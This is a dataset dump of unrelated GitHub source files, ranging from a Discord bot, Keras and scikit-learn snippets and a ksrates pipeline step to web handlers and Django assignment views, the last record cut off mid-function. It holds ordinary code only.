+{"seq_id":"32105619654","text":"#!/usr/bin/python\n\"\"\"\n discord_bot.py was created by Naum Raskind on February 25, 2023\n\"\"\"\nimport os\nimport discord\nfrom dotenv import load_dotenv\n\n\nclass FamJamClient(discord.Client):\n \"\"\"Represents Fam Jammer bot\n\n 1. The permissions for fam jammer are configured in the developer portal: https://discord.com/developers/applications/1079108221018574958/bot\n 2. To expand the class and listen to more events:\n - add event listeners in FAM_JAM_INTENTS: https://discordpy.readthedocs.io/en/stable/api.html#intents\n - override existing event handlers in discord.Client: https://discordpy.readthedocs.io/en/stable/api.html#discord.Client\n 3. To add emojis, find them here and copy paste: https://emojipedia.org/\n \"\"\"\n #: These are the events that discord will send the bot. At the moment this only includes messages sent within the server\n FAM_JAM_INTENTS = discord.Intents(guild_messages=True)\n #: Discord uses \"guild\" and \"server\" interchangeably. 
Guild name is the name of the server\n FAM_JAM_GUILD_NAME = \"Fam Jam\"\n\n def __init__(self) -> None:\n \"\"\"Construct a Fam Jam bot and set its token\"\"\"\n super().__init__(intents=self.FAM_JAM_INTENTS)\n self.token = self.get_token()\n\n async def on_ready(self) -> None:\n \"\"\"Log that the bot has connected to the fam jam server\"\"\"\n print(f'{self.user} has connected to Discord')\n\n async def on_message(self, message: discord.Message) -> None:\n \"\"\"React with the 🔥 emoji on all of Naums messages\"\"\"\n if message.author.name == \"Naum.Raskind\":\n await message.add_reaction(\"🔥\")\n\n def run(self) -> None:\n \"\"\"Start the bot and begin listening for messages\"\"\"\n super().run(self.token)\n\n def get_token(self) -> str:\n \"\"\"Retrieve the bot token from the .env file\n\n The bot token can not be viewed after it is generated. If the bot token is lost then you will need\n to go to https://discord.com/developers/applications/1079108221018574958/bot and regenerate it.\n \"\"\"\n load_dotenv()\n return os.getenv('DISCORD_TOKEN')\n\n\ndef main():\n \"\"\"Create famjammer and begin listening to messages\"\"\"\n famjammer = FamJamClient()\n famjammer.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nraskind/famjam-discord-bot","sub_path":"discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74479705473","text":"# -*- encoding: utf-8 -*-\n# @Version : 1.0 \n# @Time : 2018/5/29 15:00\n# @Author : wanghuodong \n# @note : \n\nfrom sklearn.preprocessing import MaxAbsScaler\n\nX = [\n [1,5,1,2,10],\n [2,6,3,2,7],\n [3,7,5,6,4],\n [4,8,7,8,1]\n]\nprint(\"before transform: \" ,X)\n\nscaler = MaxAbsScaler()\nscaler.fit(X)\nprint(\"scale_is: \",scaler.scale_)\nprint(\"max_abs_is: \",scaler.max_abs_)\nprint(\"n_samples_seen_is: \",scaler.n_samples_seen_)\n\nprint(\"after transform : \",scaler.transform(X))","repo_name":"firewang/python_practice_2018","sub_path":"11.DataPreprocessing.preprocessing/code/MaxAbsScaler_model.py","file_name":"MaxAbsScaler_model.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26336823257","text":"\nclass AthleteList(list):\n def __init__(self, a_name, a_dob=None, a_times=[]):\n list.__init__([])\n self.name = a_name\n self.DOB= a_dob\n self.extend(a_times)\n\n def top3(self):\n return (sorted(set([sanitize(t) for t in self]))[0:3])\n#\n# def txt(textFile):\n# try:\n# with open(textFile) as file:\n# data = file.readline()\n# temp = data.strip().split(\",\")\n# return (AthleteList(temp.pop(0),temp.pop(0),temp)) # matches with the 3 arguments above us at athelte , name , dob, times\n# except IOError as err:\n# print(\"File Error:\" + str(err))\n\ndef sanitize(time_string):\n if \"-\" in time_string:\n splitter = \"-\"\n elif \":\" in time_string:\n splitter = \":\"\n else:\n return (time_string)\n (mins, secs) = time_string.split(splitter)\n return (mins+\".\"+secs)\n\n# sarah = txt(\"sarah2.txt\")\n# julie = txt(\"julie2.txt\")\n# james = txt(\"james2.txt\")\n# mikey = txt(\"mikey2.txt\")\n#\n#\n# print(james.name+ \" fastest times are: \" + str(james.top3()))\n# print(sarah.name + \" fastest times are : \"+ str(sarah.top3()))\n# print(julie.name+ \" fastest times are: \" + str(julie.top3()))\n# print(mikey.name + \" fastest times are : \"+ 
str(mikey.top3()))","repo_name":"ValorWind1/Notes_Dan_book_headfirst","sub_path":"athlete_List.py","file_name":"athlete_List.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6406618510","text":"# -*- coding:utf-8 -*-\n# @Time : 2020/10/15\n# @Author : Leo Zhang\n# @File : writeCaseYaml.py\n# ****************************\nimport os\nimport json\nimport logging\nimport urllib.parse\nfrom comm.utils.readYaml import write_yaml_file, read_yaml_data\nfrom comm.utils.readJson import write_json_file\nfrom config import API_CONFIG, PROJECT_NAME\n\n\ndef write_case_yaml(har_path):\n \"\"\"循环读取接口数据文件\n\n :param har_path: Charles导出文件路径\n :return:\n \"\"\"\n case_file_list = list()\n logging.info(\"读取抓包文件主目录: {}\".format(har_path))\n har_list = os.listdir(har_path)\n for each in har_list:\n ext_name = os.path.splitext(each)[1]\n if ext_name == '.chlsj':\n\n logging.info(\"读取抓包文件: {}\".format(each))\n file_path = har_path+'/'+each\n with open(file_path, 'r', encoding='utf-8') as f:\n har_cts = json.loads(f.read())\n har_ct = har_cts[0]\n\n # 获取接口基本信息\n host = har_ct[\"host\"]\n port = har_ct[\"port\"]\n method = har_ct[\"method\"]\n path = har_ct[\"path\"]\n headers = har_ct[\"request\"][\"header\"]['headers']\n title = path.split(\"/\")[-1].replace('-', '')\n module = path.split(\"/\")[-2].replace('-', '')\n\n # 创建模块目录\n module_path = har_path.split('data')[0] + '/page/' + module\n try:\n os.makedirs(module_path)\n except:\n pass\n\n # 定义api通过配置\n api_config = dict()\n simp_header = dict()\n for header in headers:\n # 去除基础请求头\n base_header = ['Host',\n 'Content-Length',\n 'User-Agent',\n 'Origin',\n 'Referer',\n 'Connection',\n 'Accept',\n 'Accept-Encoding',\n 'Accept-Language']\n if header['name'] not in base_header:\n simp_header[header['name']] = header['value']\n api_config['host'] = host+':'+str(port)\n # 判断是否存在自定义消息头\n if simp_header:\n api_config['headers'] = simp_header\n else:\n api_config['headers'] = None\n api_config['cookies'] = None\n # 检查是否已存在项目配置信息,没有则写入\n rconfig = read_yaml_data(API_CONFIG)\n if rconfig:\n if PROJECT_NAME not in rconfig:\n rconfig[PROJECT_NAME] = api_config\n write_yaml_file(API_CONFIG, rconfig)\n else:\n nconfig = dict()\n nconfig[PROJECT_NAME] = api_config\n write_yaml_file(API_CONFIG, nconfig)\n\n # 定义测试信息\n test_info = dict()\n test_info[\"title\"] = module\n test_info[\"host\"] = '${host}'\n test_info[\"scheme\"] = har_ct[\"scheme\"]\n test_info[\"method\"] = method\n test_info[\"address\"] = path\n test_info[\"mime_type\"] = har_ct[\"request\"][\"mimeType\"]\n test_info[\"headers\"] = '${headers}'\n test_info[\"timeout\"] = 10\n test_info[\"file\"] = False\n test_info[\"cookies\"] = False\n test_info[\"premise\"] = False\n\n # 解析请求报文\n parameter = dict()\n try:\n if method in 'POST':\n parameter_list = urllib.parse.unquote(har_ct[\"request\"][\"body\"][\"text\"])\n elif method in 'PUT':\n parameter_list = har_ct[\"request\"][\"body\"][\"text\"]\n elif method in 'DELETE':\n parameter_list = urllib.parse.unquote(har_ct[\"request\"][\"body\"][\"text\"])\n else:\n parameter_list = har_ct[\"query\"]\n\n if \"&\" in parameter_list:\n for key in parameter_list.split(\"&\"):\n val = key.split(\"=\")\n parameter[val[0]] = val[1]\n else:\n parameter = json.loads(parameter_list)\n except Exception as e:\n logging.error(\"未找到parameter: %s\" % e)\n raise e\n\n # 定义用例信息\n test_case_list = list()\n test_case = dict()\n test_case[\"summary\"] = title\n 
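# Aside (illustrative, not part of this script): the manual "&"/"=" splitting used
# above for query-string-style bodies is what urllib.parse.parse_qs implements,
# including percent-decoding. A self-contained sketch:
from urllib.parse import parse_qs

raw = "name=demo&page=1&size=20"
parsed = {k: v[0] for k, v in parse_qs(raw).items()}  # keep first value per key
print(parsed)  # {'name': 'demo', 'page': '1', 'size': '20'}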
test_case[\"describe\"] = 'test_'+title\n\n # 定义请求入参信息,且当参数字符总长度大于200时单独写入json文件\n if len(str(parameter)) > 200:\n param_name = title+'_request.json'\n if param_name not in os.listdir(module_path):\n # 定义请求json\n param_dict = dict()\n param_dict[\"summary\"] = title\n param_dict[\"body\"] = parameter\n param_file = module_path+'/'+param_name\n logging.info(\"生成请求文件: {}\".format(param_file))\n write_json_file(param_file, [param_dict])\n test_case[\"parameter\"] = param_name\n else:\n test_case[\"parameter\"] = parameter\n\n # 定义请求返回信息\n response_code = har_ct[\"response\"][\"status\"]\n response_body = har_ct[\"response\"][\"body\"][\"text\"]\n check = dict()\n check[\"check_type\"] = 'check_json'\n check[\"expected_code\"] = response_code\n expected_request = json.loads(response_body)\n\n # 当返回参数字符总长度大于200时单独写入json文件\n if len(str(expected_request)) > 200:\n result_name = title+'_response.json'\n if result_name not in os.listdir(module_path):\n # 定义响应json\n result_dict = dict()\n result_dict[\"summary\"] = title\n result_dict[\"body\"] = expected_request\n result_file = module_path + '/' + result_name\n logging.info(\"生成响应文件: {}\".format(result_file))\n write_json_file(result_file, [result_dict])\n check[\"expected_result\"] = result_name\n else:\n check[\"expected_result\"] = expected_request\n test_case[\"check_body\"] = check\n test_case_list.append(test_case)\n\n # 合并测试信息、用例信息\n case_list = dict()\n case_list[\"test_info\"] = test_info\n case_list[\"test_case\"] = test_case_list\n\n # 写入测试用例(存在则忽略)\n case_name = 'test_'+title+'.yaml'\n case_file = module_path+'/'+case_name\n if not os.path.exists(case_file):\n logging.info(\"生成用例文件: {}\".format(case_file))\n write_yaml_file(case_file, case_list)\n\n case_file_list.append(case_file)\n return case_file_list\n\n\nif __name__ == '__main__':\n real_path = os.path.dirname(os.path.realpath(__file__)).replace('\\\\', '/')\n print('测试用例列表: ', write_case_yaml(real_path+'/data'))\n","repo_name":"gaozhen1992/ApiTesting","sub_path":"comm/script/writeCaseYml.py","file_name":"writeCaseYml.py","file_ext":"py","file_size_in_byte":7900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"23936353338","text":"import numpy as np\nimport keras\nfrom sklearn.model_selection import train_test_split\nfrom keras.preprocessing.text import one_hot\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils import to_categorical\nfrom keras.models import Sequential\nfrom keras.layers import GRU, Dense, Activation, InputLayer, Bidirectional, LSTM\nfrom keras.callbacks import ModelCheckpoint\nfrom gensim.models import Word2Vec, KeyedVectors\nimport matplotlib.pyplot as plt\n\nproduct_id = []\nsession_max_length = 12\nvocab = {}\n\n\n\ndef load_data(data_path):\n f = open(data_path, mode='r', encoding='utf-8')\n wv_model = KeyedVectors.load_word2vec_format('wv.model', binary=False)\n product_id.extend(wv_model.index2word)\n dict_size = len(product_id)\n X_sequence_product = []\n Y_target_product = []\n for line in f:\n item_in_session = line.split('\\t')\n x_sequence_product = []\n for i in range(len(item_in_session) - 1):\n item = item_in_session[i].replace('\\n', '')\n vector_item = wv_model.wv[item]\n x_sequence_product.append(vector_item)\n vector_target = product_id.index(item_in_session[len(item_in_session) - 1].replace('\\n', ''))\n X_sequence_product.append(x_sequence_product)\n Y_target_product.append(vector_target)\n X_train = pad_sequences(X_sequence_product, session_max_length, padding='post', 
dtype='float32')\n Y_train = to_categorical(Y_target_product, num_classes=len(product_id))\n #print(Y_train.shape[1])\n print(len(wv_model.vocab))\n vocab = wv_model.vocab\n return X_train, Y_train\n\ndef top_k_accuracy(y_true, y_pred):\n return keras.metrics.top_k_categorical_accuracy(y_true=y_true, y_pred=y_pred, k=10)\n\ndef train_model(data_path):\n X, Y = load_data(data_path)\n X_train, X_valid, Y_train, Y_valid = train_test_split(X, Y, test_size=0.1)\n\n model = Sequential()\n model.add(InputLayer(input_shape=(12, 100)))\n model.add(Bidirectional(GRU(128, recurrent_dropout=0.35, return_sequences=True)))\n model.add(Bidirectional(GRU(128, recurrent_dropout=0.35, return_sequences=False)))\n model.add(Dense(len(product_id), activation='softmax'))\n model.summary()\n print(product_id)\n board = keras.callbacks.TensorBoard(log_dir='E:\\Logs', histogram_freq=0, batch_size=32, write_graph=True, write_grads=False,\n write_images=False, embeddings_freq=0, embeddings_layer_names=None,\n embeddings_metadata=None, embeddings_data=None)\n model_name = '../rs.h5'\n checkpointer = ModelCheckpoint(filepath=model_name, monitor='val_acc', verbose=1, save_best_only=True)\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy', top_k_accuracy])\n #model.evaluate()\n history = model.fit(X_train, Y_train, validation_data=[X_valid, Y_valid], batch_size=512, epochs=30, callbacks=[checkpointer, board])\n # Plot training & validation accuracy values\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('Model accuracy')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\n # Plot training & validation loss values\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\nif __name__ == '__main__':\n train_model(data_path='../data_sample/new_train_sequence.dvg')\n #load_data()\n","repo_name":"TuanDH94/sessionRecommendation","sub_path":"lstm_model/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13327609219","text":"from collections import Counter\n\n\n# worst case depends on the time complexity of the sort function\n# but this is at least O(n) plus the time complexity of the sorted function\ndef check_pal(word):\n sort = ''.join(sorted(word))\n odd = 0\n count = 0\n for i in range(len(sort)):\n if i != (len(sort) - 1) and sort[i] != sort[i + 1]:\n count += 1\n if count & 1 == 1:\n odd += 1\n count = 0\n elif count == 0:\n odd += 1\n if odd > 1:\n return False\n else:\n count += 1\n return True\n\n\n#for the below use a collections.counter\n\ndef pali(s):\n thing = Counter(s)\n return sum(v % 2 for v in thing.values()) <= 1 \n\n\ns = 'llorcan'\n#print(check_pal(s))\nprint(pali(s))","repo_name":"lorcanj/EPI_practice","sub_path":"chapter12/pali.py","file_name":"pali.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4455782084","text":"import os\r\nimport json\r\nfrom modules.utils.exceptions import ReportNotFound, NoTestData\r\n\r\ndef getCodeCoverageFromJSON(filepath):\r\n\r\n if not os.path.isfile( filepath ):\r\n print( f'##[error] Report not found at {filepath}' )\r\n raise ReportNotFound( 
filepath )\r\n\r\n with open( filepath, 'rb') as file:\r\n data = json.load( file )\r\n \r\n if( ( not 'result' in data ) or ( not 'coverage' in data[ 'result' ] ) or \r\n ( not 'coverage' in data[ 'result' ]['coverage'] )):\r\n print( f'##[warning] Report does not contain code coverage data' )\r\n raise NoTestData()\r\n \r\n mapTestClasses = dict()\r\n testResultInfo = data[ 'result' ][ 'coverage' ]\r\n if 'coverage' in testResultInfo:\r\n coverageData = testResultInfo[ 'coverage' ]\r\n if isinstance( coverageData, list ):\r\n for codeCoverageItem in coverageData:\r\n getCoverageData( codeCoverageItem, mapTestClasses )\r\n else:\r\n getCoverageData( coverageData, mapTestClasses )\r\n\r\n \"\"\" if 'codeCoverageWarnings' in testResultInfo:\r\n codeCoverageWarning = testResultInfo[ 'codeCoverageWarnings' ]\r\n if isinstance( codeCoverageWarning, list ):\r\n for codeCoverageWarningItem in codeCoverageWarning:\r\n getCoverageWarning( codeCoverageWarningItem, mapTestClasses )\r\n else:\r\n getCoverageWarning( codeCoverageWarning, mapTestClasses ) \"\"\"\r\n\r\n return mapTestClasses\r\n\r\n\r\ndef getCoverageWarning( codeCoverageWarning, mapTestClasses ):\r\n \r\n message = codeCoverageWarning[ 'message' ]\r\n classWarningName = codeCoverageWarning[ 'name' ]\r\n\r\n if classWarningName in mapTestClasses:\r\n mapTestClasses[ classWarningName ][ 'WARNING' ] = message\r\n else:\r\n mapTestClasses[ classWarningName ] = dict()\r\n mapTestClasses[ classWarningName ][ 'WARNING' ] = message\r\n mapTestClasses[ classWarningName ][ 'Number of lines' ] = 'N/A'\r\n mapTestClasses[ classWarningName ][ 'Number of uncovered lines' ] = 'N/A'\r\n\r\n\r\n\r\ndef getCoverageData( codeCoverageItem, mapTestClasses ):\r\n className = codeCoverageItem[ 'name' ]\r\n numLines = codeCoverageItem[ 'totalLines' ] #\r\n numUncoveredLines = int(numLines) - int(codeCoverageItem[ 'totalCovered' ]) #\r\n\r\n if not className in mapTestClasses:\r\n mapTestClasses[ className ] = dict()\r\n\r\n mapTestClasses[ className ][ 'Number of lines' ] = int( numLines )\r\n mapTestClasses[ className ][ 'Number of uncovered lines' ] = int( numUncoveredLines )\r\n\r\n if int( numUncoveredLines ) > 0:\r\n totalLines = codeCoverageItem[ 'lines' ]\r\n uncoveredLines = [line for line in totalLines if totalLines[line] == 0]\r\n mapTestClasses[ className ][ 'Lines not covered' ] = ', '.join( uncoveredLines )\r\n \r\n \r\ndef sortDictionaries(mapCoverage, mapPercent):\r\n # Sort the TestResult Dictionary for better view on report\r\n classList = [k for k, v in sorted(mapPercent.items(), key=lambda item: item[1])]\r\n mapData = dict()\r\n for className in classList:\r\n mapData[ className ] = mapCoverage[className]\r\n mapData[ className ]['Percent'] = mapPercent[className]\r\n return mapData","repo_name":"Kiran-Waghamare/actions-pipelines","sub_path":"codeCoverage/modules/utils/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3586742622","text":"import math as Maths\nfrom . 
import meters_privatefunctions as MeterFunctions\n\nclass DefineBlockMeter:\n\n\tdef __init__(self, metertype):\n\n\t\tself.datavalue = 0\n\n\t\tself.metertype = metertype\n\n\t\tself.endangle = 185.0\n\n\t\tself.countermax = 9.5\n\n\t\tif self.metertype == \"Outer\":\n\t\t\tself.circleradius = 49.5\n\t\telse:\n\t\t\tself.circleradius = 36.5\n\n\t\tself.circumference = self.circleradius * Maths.pi * 2.0\n\n\tdef setmetervalue(self, newvalue):\n\n\t\tself.datavalue = newvalue\n\n\n\n\tdef getmeterdata(self):\n\n\t\treturn self.generatemeterdata(self.datavalue)\n\n\n\tdef getdummydata(self):\n\n\t\treturn self.generatemeterdata(0)\n\n\n\tdef generatemeterdata(self, countervalue):\n\n\t\tstartangle = MeterFunctions.getblockmeterangle(countervalue, self.endangle, self.countermax)\n\n\t\tfilledangle = (self.endangle - startangle) / 360.0\n\n\t\toutcome = {}\n\t\toutcome['fill'] = filledangle * self.circumference\n\t\toutcome['gap'] = self.circumference - outcome['fill']\n\t\toutcome['offset'] = ((180.0 - startangle) / 360.0) * self.circumference\n\n\t\treturn outcome\n\n\n\n\n\n","repo_name":"johnpcole/Download-Manager","sub_path":"codebase/manager_component/monitoring_subcomponent/dashboardmeters_subcomponent/meter_subcomponent/blockmeter_class.py","file_name":"blockmeter_class.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13277841529","text":"import os\nimport logging\nimport datetime\nimport ksrates.fc_configfile as fcConf\nimport ksrates.fc_check_input as fcCheck\nimport ksrates.fc_wgd as fc_wgd\nfrom ksrates.utils import init_logging\n\n\ndef wgd_orthologs(config_file, species_one, species_two, n_threads):\n # INPUT\n species_pair = sorted([species_one, species_two], key=str.casefold)\n species1, species2 = species_pair[0], species_pair[1] # sorted!\n\n config = fcConf.Configuration(config_file)\n init_logging(f\"Ortholog wgd analysis for species pair [{species1} - {species2}]\", config.get_logging_level())\n\n # Get parameters and FASTA files from configuration file\n latin_names = config.get_latin_names()\n\n fasta_names_dict = config.get_fasta_dict()\n species1_fasta_file = config.get_fasta_name(fasta_names_dict, species1)\n fcCheck.check_inputfile(species1_fasta_file, \"FASTA file\")\n fcCheck.check_IDs(species1_fasta_file, latin_names[species1])\n\n species2_fasta_file = config.get_fasta_name(fasta_names_dict, species2)\n fcCheck.check_inputfile(species2_fasta_file, \"FASTA file\")\n fcCheck.check_IDs(species2_fasta_file, latin_names[species2])\n\n # Creating folder for output files of wgd ortholog pipeline.\n # Note: since in Nextflow mode there are multiple wgdOrtholog processes running in parallel,\n # this \"if-try-except\" prevents that almost-simultaneous checks rise an error: a slower process \n # would rise an error if in the meanwhile a faster process had already created the folder.\n ortholog_dists_dir = os.path.join(\"ortholog_distributions\", \"\")\n if not os.path.exists(ortholog_dists_dir):\n logging.info(f\"Creating directory {ortholog_dists_dir}\")\n os.makedirs(ortholog_dists_dir, exist_ok=True)\n\n # -----------------------------------------------------------------------------\n\n # ESTIMATING ORTHOLOG Ks VALUES\n logging.info(\"Running wgd ortholog Ks pipeline...\")\n fc_wgd.ks_orthologs(species1, species2, species1_fasta_file, species2_fasta_file, base_dir=ortholog_dists_dir,\n n_threads=n_threads)\n\n logging.info(datetime.datetime.today().ctime())\n 
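# Aside (sketch, not ksrates code): the directory-creation guard above relies on
# os.makedirs(..., exist_ok=True), which is already safe when parallel workers race
# to create the same folder; the os.path.exists() pre-check only keeps the log tidy.
import os

def ensure_dir(path):
    if not os.path.exists(path):
        print(f"Creating directory {path}")
    os.makedirs(path, exist_ok=True)  # no error if another process created it first

ensure_dir("ortholog_distributions")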
logging.info(\"Done\")\n","repo_name":"altingia/ksrates","sub_path":"ksrates/wgd_orthologs.py","file_name":"wgd_orthologs.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"8995299719","text":"from keras.models import model_from_json\nfrom keras.layers import Conv2D, Activation, Dense\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.advanced_activations import PReLU\nimport keras.backend as K\n\n\ndef conv2d(previous_layer, filters, kernel_size=(3, 3), strides=(1, 1), padding=\"same\", activation=\"relu\",\n batch_norm=True, before_activation=True):\n x = Conv2D(filters, kernel_size, strides=strides, padding=padding)(previous_layer)\n if batch_norm is True and before_activation is True:\n x = BatchNormalization()(x)\n if activation == \"prelu\":\n x = PReLU()(x)\n else:\n x = Activation(activation)(x)\n if batch_norm is True and before_activation is False:\n x = BatchNormalization()(x)\n return x\n\n\ndef dense(previous_layer, units, activation=\"relu\", batch_norm=True, before_activation=True):\n x = Dense(units)(previous_layer)\n if batch_norm is True and before_activation is True:\n x = BatchNormalization()(x)\n if activation == \"prelu\":\n x = PReLU()(x)\n else:\n x = Activation(activation)(x)\n if batch_norm is True and before_activation is False:\n x = BatchNormalization()(x)\n return x\n\n\ndef save_model(model, json_filename, weights_filename):\n model_json = model.to_json()\n with open(json_filename, \"w\") as json_file:\n json_file.write(model_json)\n model.save_weights(weights_filename)\n # print(\"Saved model to disk\")\n\n\ndef load_model(json_filename, weights_filename):\n try:\n json_file = open(json_filename, 'r')\n except:\n json_file = None\n if json_file is not None:\n loaded_model_json = json_file.read()\n json_file.close()\n model = model_from_json(loaded_model_json)\n model.load_weights(weights_filename)\n print(\"Loaded model from disk\")\n return model, True\n else:\n return None, False\n\n\ndef precision(y_true, y_pred):\n '''Calculates the precision, a metric for multi-label classification of\n how many selected items are relevant.\n '''\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision\n\n\ndef recall(y_true, y_pred):\n '''Calculates the recall, a metric for multi-label classification of\n how many relevant items are selected.\n '''\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n recall = true_positives / (possible_positives + K.epsilon())\n return recall\n\n\ndef beta_score(y_true, y_pred):\n '''Calculates the F score, the weighted harmonic mean of precision and recall.\n This is useful for multi-label classification, where input samples can be\n classified as sets of labels. By only using accuracy (precision) a model\n would achieve a perfect score by simply assigning every class to every\n input. In order to avoid this, a metric should penalize incorrect class\n assignments as well (recall). The F-beta score (ranged from 0.0 to 1.0)\n computes this, as a weighted mean of the proportion of correct class\n assignments vs. the proportion of incorrect class assignments.\n With beta = 1, this is equivalent to a F-measure. 
With beta < 1, assigning\n correct classes becomes more important, and with beta > 1 the metric is\n instead weighted towards penalizing incorrect class assignments.\n '''\n\n treshold = K.constant(0.2)\n greater_mask = K.greater(y_pred, treshold)\n y_pred_final = K.cast(greater_mask, \"float32\")\n\n beta = 2\n if beta < 0:\n raise ValueError('The lowest choosable beta is zero (only precision).')\n\n # If there are no true positives, fix the F score at 0 like sklearn.\n if K.sum(K.round(K.clip(y_true, 0, 1))) == 0:\n return 0\n\n p = precision(y_true, y_pred_final)\n r = recall(y_true, y_pred_final)\n bb = beta ** 2\n # fbeta_score = (1 + bb) * (p * r) / (bb * p + r + K.epsilon())\n fbeta_score = (1 + bb) * (p * r) / (bb * p + r)\n return fbeta_score\n","repo_name":"nyounes/kaggle","sub_path":"amazon/keras_tools.py","file_name":"keras_tools.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"646104556","text":"from aiogram import types\nfrom aiogram.dispatcher.filters.builtin import CommandHelp\n\nfrom loader import dp\n\n\n@dp.message_handler(CommandHelp())\n@dp.message_handler(text='Помощь')\nasync def bot_help(message: types.Message):\n text = (\"Список команд: \",\n \"/start - Вернуться в главное меню\",\n \"/help - Получить справку\",\n \"/menu - Посмотреть меню\",\n \"\",\n \"Если что-то не понятно или \",\n \"есть какие-то вопросы пишите \",\n \"на почту: example@mail.ru\",\n\n )\n \n await message.answer(\"\\n\".join(text))\n","repo_name":"IvanKem/test-restaurant-bot","sub_path":"handlers/users/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8632994445","text":"import aiohttp_jinja2\nimport aiohttp\n\nfrom aiohttp_session import get_session\nimport controllers.controller\nimport views.index_view\nimport models.article.sqlite_dao, models.article.data, models.article.services\n\n\nclass IndexController(controllers.controller.Controller):\n routes = aiohttp.web.RouteTableDef()\n\n @routes.get('/')\n async def index_get(request):\n session = await get_session(request)\n article_services = models.article.services.ArticleServices(request)\n if 'q' in request.rel_url.query:\n search_string = request.rel_url.query['q']\n print('opa: ' + search_string)\n else:\n search_string = ''\n article_list = await article_services.fetch_articles(search_string)\n if 'username' in session:\n username = session['username']\n else:\n username = None\n return await views.index_view.handle(request, {'username': username, 'article_list': article_list})","repo_name":"brmorais92/ufgnews","sub_path":"controllers/index_controller.py","file_name":"index_controller.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23028034425","text":"from django.contrib import messages\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render\nfrom assignments.forms import AssignmentsForm, StudentUploadForm, Assignments_Boostrap_Form\nfrom data.models import Class, Assignment, Group, StudentUpload, AssignmentRelationship, Relationship, Notification\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\n\n\n# Create your views here.\ndef assignment_main_page(request, class_pk):\n class_instance = 
Class.objects.filter(class_id=class_pk).first()\n if not class_instance:\n messages.info(request, \"No Such Class\")\n return HttpResponseRedirect(\"/groups/class/\"+str(class_pk))\n if class_instance.instructor_instance != request.user:\n messages.info(request, \"You are not the instructor of this class\")\n return HttpResponseRedirect(\"/groups/class/\" + str(class_pk))\n\n assignments_in_this_class = Assignment.objects.filter(class_instance=class_instance)\n\n if request.method == 'POST':\n form = AssignmentsForm(request.POST, request.FILES)\n print(\"create form\")\n if form.is_valid():\n print(\"form.is_valid()\")\n a = form.save()\n # push notifications to all students in that class\n relations = Relationship.objects.filter(class_instance=class_instance)\n print(relations)\n for r in relations:\n new_notification = Notification(class_instance=class_instance,\n sender_instance=request.user,\n receiver_instance=r.student_instance,\n status=20)\n new_notification.save()\n\n return render(request, 'assignment_main_instructor.html', {\n 'class_ins': class_instance,\n 'assignments': assignments_in_this_class,\n 'form': form,\n })\n else:\n form = AssignmentsForm(initial={'class_instance': class_instance})\n return render(request, 'assignment_main_instructor.html', {\n 'class_ins': class_instance,\n 'assignments': assignments_in_this_class,\n 'form': form,\n })\n\n\ndef show_student_upload(request, a_pk, g_pk):\n assignment_ins = Assignment.objects.filter(assignment_id=a_pk).first()\n if not assignment_ins:\n messages.info(request, \"No Such Class\")\n return HttpResponseRedirect(\"/explore\")\n group_ins = Group.objects.filter(group_id=g_pk).first()\n # for test\n if request.method == 'POST':\n form = StudentUploadForm(request.POST, request.FILES)\n if form.is_valid():\n student_upload = form.save()\n print(student_upload.upload_file)\n\n temp_a_re = AssignmentRelationship.objects.filter(group_instance=group_ins,\n assignment_instance=assignment_ins)\n if not temp_a_re:\n # this group hasn't uploaded file for this assignment\n new_a_re = AssignmentRelationship()\n new_a_re.student_upload_instance = student_upload\n new_a_re.group_instance = group_ins\n new_a_re.assignment_instance = assignment_ins\n new_a_re.save()\n print(new_a_re.upload_time)\n print(new_a_re.student_upload_instance.upload_file)\n\n else:\n # this group has already uploaded a file for this assignment\n exist_a_re = temp_a_re.first()\n old_student_upload = exist_a_re.student_upload_instance\n exist_a_re.student_upload_instance = student_upload\n exist_a_re.save()\n 